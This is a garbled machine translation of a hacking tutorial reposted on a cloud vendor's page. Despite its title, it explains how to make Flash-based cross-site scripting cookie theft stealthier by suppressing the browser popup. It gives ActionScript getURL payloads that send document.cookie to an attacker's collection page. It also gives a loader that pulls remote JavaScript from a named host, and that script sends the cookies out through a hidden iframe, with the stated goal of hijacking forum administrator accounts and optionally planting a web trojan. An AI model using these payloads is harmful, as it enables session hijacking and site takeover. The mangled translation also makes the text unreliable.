Prevent flash cross-stop attack popup IE window

Source: Internet
Author: User
Tags eval send cookies
The day before the attack was busy learning WIN32 compilations, have been lazy to write articles, these days like Flash Cross station attack is very fierce, but in the implementation of Flash Cross-site attack when the pop-up IE window is very easy to arouse the suspicion of others, and make Flash Cross station attack failed, it really makes people a little headache, Do you have been looking for the implementation of Flash Cross-site attacks do not eject the IE window method to hide their own attack behavior? Below everyone and I together to solve this moderate problem, let Flash Cross station attack more perfect it!
In general, everyone in the Flash Cross-site attack is to do a flash animation, and in the first frame to jump to other URLs of the Ationscript script functions, as follows:
GetURL (' BLOCKED scriptwindow.open (' http://' address of the Web page used to collect cookies? ') +document cookies) "," "_self" and then put this flash animation in the forum of the signature, post or SMS message, used to get the administrator or user cookies, so that the administrative authority, further opportunistic control of the entire site, and ultimately achieve their own purposes. We can see that this ationscript script is the most important part of the entire Cross station attack! This is the script used in the code to open a love and hate window, so we can only change the script to implement the code to hide or remove the pop-up IE window, in addition to the other way!
Let's first analyze the Ationscript script above, which uses the Ationscript script function "GetURL" Jump to a URL that uses the JavaScript protocol (the JavaScript protocol is followed by our very familiar JavaScript scripting code), Use Document.cookie to cookies in JavaScript and connect the cookie to the URL of an HTTP protocol with a Web page address for collecting cookies, and finally use window.open to open the synthesized URL address to use the cookie with the get side Send to the Web page used to collect cookies and record them.
Through the above analysis we further understand that the pop-up IE window is due to the JavaScript protocol in the code window.open generated, I believe we all know window.open's second parameter is used to specify the name of the open window, its universal name has "_media (IE6.0 opens in the media panel to the left of the browser), _blank (Open in New window), _parent (open in the parent frame of the current frame). If the current frame has no parent frame, this parameter value is equivalent to _self) "," _search (IE5.0 Open in the search panel to the left of the browser), _self (open in the current window, overwrite the current document), "_top (open in the topmost window outside all frames.) If the current window has no frame structure, this parameter value is equivalent to _self) "and so on, if we use" _search "to open the window, is not there is no pop-up ie window? The Ationscript script is changed to:
GetURL (' BLOCKED scriptwindow.open (' http://' address of the Web page used to collect cookies? ') +document cookies, ' _search ') "," _self ")

Of course, this will open the search panel, but also cause suspicion, but can avoid those who turn off pop-up software to kill! Let's just think of a way to do it!
If it is just said above, I believe many readers want to put me ...
See the smart Here you are not thinking of a point to solve the idea? Right! Now that you support JavaScript, what else can not be solved? JavaScript is really a lot of good!
If you have read my article "to create a perfect Internet Explorer Trojan", and you understand the code, you can think of it first!
In that article there is the following code:

Jsurl= "Http://www.godog.y365.com/wodemuma/icyfox.js". Replace (/\//g, '//');
window.open ("file:blocked SCRIPTdocument.all.tags (' SCRIPT ') [0].src= '" +jsurl+ "'; eval ();", "icyfoxlovelace");

Using the JavaScript protocol to the site of a JS code file inserted into the local file, the same reason we can use it to insert a JS code file into a cross-site attack on the Forum page, the corresponding Ationscript script to:

GetURL ("BLOCKED SCRIPTdocument.all.tags" (' SCRIPT ') [0].src= ' http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js '; eval (); "," _self ")

The contents of Icyfox.js are as follows:

Cookieurl= "http://is used to collect cookies from the Web page address? cookie=" +escape (Document.cookie);

/* here, Escape () is used to encode cookies to prevent some special characters in the cookie * *
Document.body.insertAdjacentHTML (' BeforeEnd ', ' <iframe width=0px height=0px style= ' display:none; "src=" ' + cookieurl+ ' "><\/iframe>");
/* Here used the insertadjacenthtml at the end of the body inserted an invisible frame * *

This is mainly the use of a Web page can be introduced into a different domain JavaScript code documents, and the introduction of JavaScript code documents will be integrated with this page features!

All right! This flash Cross station attack pop-up IE window problem is solved! Of course, if you want to, in the Icyfox.js add a Web page trojan and so I have nothing to say!
Finally, by the way, it can also be used in other types of Cross-site scripting work hit the Hidden popup ie window! It is much more casual than sending a cookie using the Microsoft.XMLHTTP control, because it will not be sent to the current server as the Microsoft.XMLHTTP control, and the focus is Czy " Using the Microsoft.XMLHTTP control to send cookies "the following sentence is mentioned in the article:

"I used to think of a way to use the insertAdjacentHTML method to inject HTML statements in a Web page. It is possible to send cookies without the IE window, but there are times when IE errors are encountered in actual use. "

With my analysis because there are some special characters in the cookie, and Czy is not properly processed or encoded, it will sometimes encounter ie error in actual use, so the above code I use Escape () to the cookie encoding, After receiving the cookie, please note that use unescape () to decode!



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.